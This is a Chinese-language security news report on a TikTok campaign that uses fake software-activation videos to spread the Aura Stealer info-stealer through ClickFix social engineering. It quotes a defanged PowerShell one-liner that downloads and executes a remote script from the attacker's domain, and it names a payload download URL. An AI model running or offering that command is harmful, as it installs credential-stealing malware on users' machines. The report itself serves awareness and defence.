网络犯罪分子通过 TikTok 上的活动传播信息窃取恶意软件,使用的视频谎称是流行软件的免费激活指南。 2025 年 10 月 19 日发现的正在进行的操作使用社会工程方法来诱骗用户感染自己的计算机。
ISC 处理程序 Xavier Mertens 报告了该活动,并指出其与趋势科技 5 月份观察到的一次操作相似。 TikTok 视频声称提供了激活 Windows、Microsoft 365、Adobe Premiere、Photoshop、CapCut Pro 和 Discord Nitro 等合法软件的说明。该活动还宣传虚假服务,包括“Netflix Premium”和“Spotify Premium”,以吸引更广泛的观众。
这种攻击技术被称为 ClickFix 攻击,它涉及提供看似有用的指令,欺骗用户运行恶意命令。这些视频显示了一条简短的一行 PowerShell 命令,并指示观看者以管理员权限执行该命令。显示的示例命令为 iex (irm slmgr[.]win/photoshop)。 URL 中的特定程序名称(例如“photoshop”)会被更改以匹配视频中模拟的软件。
当用户执行此命令时,PowerShell 将连接到远程站点 slmgr[.]win。此操作检索并运行第二个 PowerShell 脚本,然后该脚本从 Cloudflare 页面下载两个可执行文件。第一个文件是从 https://file-epq[.]pages[.]dev/updater.exe 下载的,是 Aura Stealer 恶意软件的变种。 Aura Stealer 旨在从网络浏览器、身份验证 cookie、加密货币钱包以及其他应用程序的登录数据中获取保存的凭据。然后,这些被盗的信息会上传给攻击者,使他们能够访问受害者的帐户。
还下载了名为 source.exe 的第二个有效负载。此可执行文件用于使用 .NET 框架的内置 Visual C# 编译器 (csc.exe) 自编译代码。编译后的代码随后被注入并直接在内存中启动。第二个有效载荷的具体用途尚未确定。
按照这些视频中的说明进行操作的用户应考虑其所有凭据已被泄露,并建议立即重置他们使用的所有网站和在线服务的密码。
ClickFix 攻击在过去一年中变得更加普遍。它们被用来在与勒索软件和加密货币盗窃相关的活动中分发各种恶意软件。作为一般安全实践,用户永远不应该从网站复制文本并在操作系统对话框中执行它,包括文件资源管理器地址栏、命令提示符、PowerShell、macOS 终端或 Linux shell。
